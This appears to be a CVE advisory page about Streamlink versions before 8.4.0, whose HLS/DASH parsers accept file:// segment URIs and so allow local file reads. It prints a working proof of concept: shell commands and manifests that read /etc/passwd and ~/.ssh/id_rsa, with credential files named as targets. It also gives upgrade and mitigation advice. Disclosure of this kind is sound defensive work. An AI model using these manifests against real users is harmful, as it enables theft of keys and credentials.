Streamlink, URI Scheme Validation Bypass, CVE-2026-44353 (High) -DC-Jun2026-88

Listen to this Post

Intro – How CVE-2026-44353 Works

Streamlink versions before 8.4.0 fail to validate URI schemes when parsing HLS (.m3u8) and DASH (.mpd) manifests.
An attacker can host a malicious playlist that includes `file://` URIs instead of https://` segments.
The HLS/DASH parsers blindly accept any URI scheme without checking if it is local or remote.
When Streamlink processes such a manifest, it interprets `file:///etc/passwd` as a valid segment.
The utility then opens the local file using standard filesystem APIs.
Streamlink reads the entire contents of that file from disk.
Those contents are then written directly to the output stream (e.g., stdout or a video player).
This effectively turns Streamlink into an arbitrary local file read primitive.
No authentication or special privileges are required on the target machine.
The attack is triggered simply by asking Streamlink to play a malicious `.m3u8` or `.mpd` URL.
The URL can be delivered via phishing, malicious websites, or man‑in‑the‑middle attacks.
Streamlink does not warn the user that local file access is occurring.
The issue exists because the parser uses generic URI handling without scheme filtering.
`file://` is treated the same as `http://` or `https://` during segment resolution.
This violates the principle of least privilege for a network streamer.
The vulnerability affects both HLS (HTTP Live Streaming) and DASH (Dynamic Adaptive Streaming over HTTP).
An attacker can read any file readable by the Streamlink process’s user.
Common targets include
/etc/passwd, configuration files, SSH keys, and application secrets.
The output stream may be saved to disk or piped to another process, exfiltrating data.
Even non‑root users can read sensitive user data (e.g.,
.bash_history,.aws/credentials).
The attack does not require code execution on the target – only a crafted manifest URL.
Streamlink versions prior to 8.4.0 are vulnerable across all supported operating systems.
The fix in 8.4.0 adds strict URI scheme validation: only
http,https, and allowed schemes.
<h2 style="color: blue;">
file://is explicitly rejected by the parsers.</h2>
No configuration change is needed for the fix – upgrading is sufficient.
The vulnerability was assigned CVE-2026-44353 with a CVSS 3.x base score of 7.5 (High).
Disclosure and patch were coordinated through GitHub Security Lab.
NVD published the entry on May 27, 2026, with last modification on June 1, 2026.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: Streamlink
Version: Below 8.4.0
Vulnerability: Scheme validation missing
Severity: CVSS 7.5 High
date: 2026-06-01
<h2 style="color: blue;">Prediction: 2026-05-27</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>

Craft malicious HLS playlist (evil.m3u8)
echo "EXTM3U" > evil.m3u8
echo "EXTINF:10," >> evil.m3u8
echo "file:///etc/passwd" >> evil.m3u8
Serve it (e.g., with Python)
python3 -m http.server 8080
Victim runs streamlink against the malicious URL
streamlink http://localhost:8080/evil.m3u8 best
Expected output: contents of /etc/passwd printed to stdout
DASH manifest example (evil.mpd)
cat > evil.mpd <<EOF
<?xml version="1.0"?>
<MPD>
<Period>
<AdaptationSet>
<Representation>
<SegmentList>
<SegmentURL media="file:///home/user/.ssh/id_rsa"/>
</SegmentList>
</Representation>
</AdaptationSet>
</Period>
</MPD>
EOF

<h2 style="color: blue;">Exploit:</h2>
1. Attacker hosts an HLS/DASH manifest with `file://` segment URLs pointing to a target file.
<h2 style="color: blue;">2. Victim is tricked into running
streamlink `.

3. Streamlink requests the manifest, parses it, and attempts to read each `file://` segment.
4. Local file contents are streamed to the victim’s output (video player, file, or stdout).

Protection:

  • Upgrade to Streamlink 8.4.0 or later.
  • If upgrading impossible, apply a patch that rejects non‑http/https schemes in HLS/DASH parsers.
  • Use a firewall or proxy to block outgoing connections to untrusted manifest URLs.
  • Monitor Streamlink invocations for unexpected `file://` references in logs or network traffic.

Impact:

Arbitrary local file disclosure. An attacker can read any file accessible to the Streamlink process, leading to credential theft, configuration leakage, and further system compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top